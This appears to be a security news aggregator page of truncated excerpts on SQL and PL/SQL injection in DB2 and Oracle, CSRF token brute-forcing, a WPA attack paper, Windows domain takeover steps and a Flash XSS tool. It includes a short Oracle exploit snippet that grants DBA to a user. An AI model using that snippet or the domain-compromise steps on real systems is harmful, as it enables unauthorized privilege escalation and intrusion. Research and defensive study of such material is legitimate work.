Vulnerable InforMation And IT News

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience.  When you do find one, though it pays to be prepared…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection.  All tests were performed on DB2 8.2 under Windows. 

This post is part of series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to

[Read All About This Article]

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-010
http://dsecrg.com/pages/vul/show.php?id=110

Application: Oracle Database 10G
Versions Affected: Oracle 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4
Vendor URL: http://oracle.com
Bugs: PL/SQL Injections
Exploits: YES
Reported: 29.01.2008
Vendor response:

[Read All About This Article]

Until now, it was considered infeasible for an attacker to discover your CSRF token using Brute Force Attacks on the server. I am going to change this belief by showing you a technique to quicky find csrf tokens without generating alerts.

Credit:
The information has been provided by Inferno at SecureThoughts.com and Jeremiah Grossman.

I was thinking about the problem of Cross Site Request Forgery and current mitigation strategies used in the Industry. In many of the real

[Read All About This Article]

If it is not availabe,please tell me.

Researchers Toshihiro Ohigashi Hiroshima University and University of Morii Masakatu Kob able to crack WPA in just 1 minute, using a technique called Practical Attack Message forgery or practice of attack message forgery.

http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf

[Read All About This Article]

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and

[Read All About This Article]

The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008

So, if you need to use it outside metasploit, here it is:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);


[Read All About This Article]

This is an updated version of bsqlbf. This now has the VALIDATE_REMOTE_RC() exploit which David Litchfield discussed in his paper

6: Type 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]

This vulnerability was patched by Oracle in July 2009 Critical Patch Update. In a nutshell, if you have identified a SQL injection as ‘SYS’ user than

[Read All About This Article]

David Litchfield yesterday released 3 papers describing security issues which have now been addressed by Oracle.
Out of these, I found this one particularly interesting.

In a nut shell, this paper talks about 2 functions, which allows execution of PL/SQL and an attacker can use these to inject PL/SQL even if he found just a SQL Injection. THis could also be used to get around the create function privilege. This is very similar to DBMS_EXPORT_EXTENSION vulnerability what David

[Read All About This Article]

fly_flash — Jump/XSS/CSRF in Flash

Author: lake2@80sec.com
Site: http://www.80sec.com
Date: 2009-8-26
From: http://www.80sec.com/release/fly_flash.txt
80SEC — know it then hack it !

[ description ]

fly_flash is a tool for penetration in flash

[ usage ]

upload fly_flash.swf and fly_flash.txt to your server in same directory, embed fly_flash.swf in other website, modify the fly_flash.txt first: ,[,,,data]

cmd


[Read All About This Article]